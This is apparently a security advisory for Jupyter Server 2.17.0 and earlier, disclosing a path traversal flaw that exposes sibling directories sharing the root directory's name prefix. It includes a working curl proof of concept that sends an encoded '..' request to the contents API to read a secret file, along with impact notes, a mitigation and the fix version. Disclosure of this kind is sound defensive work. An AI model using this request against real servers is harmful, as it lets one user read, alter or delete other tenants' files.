Jupyter Server <=2.17.0 can access directories sibling to the root directory, if it starts with the root dir's name.
Minimal:
.
├── test/ <- root directory.
│ └── test.txt
└── testtest/
└── secret.txt <- file to exfiltrate that we should not be able to access via API
HOST="http://localhost:8888"
TOKEN=""
SIBLING="testtest"
TARGET="secret.txt"
curl -s -X POST \
"$HOST/api/contents/%2e%2e/$SIBLING/$TARGET/checkpoints" \
-H "Authorization: token $TOKEN"
Full PoC by @stef41: https://gist.github.com/Yann-P/66d4982a965dee8fcb8dd89db29e7006
It is possible for an authenticated user to access content outside the server's root_dir in siblings directories sharing the same prefix as the root_dir. The attacker can escalate access, reading, writing, and deleting from sibling directories.
This can have a tangible impact for deployments using predictable naming scheme with multi-tenant server, for example user1, user2, user3, ..., user10 etc, as user1 could access and modify files of all user10 - user19 and higher.
In a hypothetical system where users can choose a name of their folder, an attacker could choose a single-letter username to gain access to a significant number of sibling directories.
Use folder names that do not overlap.
Thank you to @stef41 for providing a useful PoC.
2.18.0Exploitability
AV:NAC:HPR:LUI:NScope
S:UImpact
C:HI:HA:L7.1/CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:L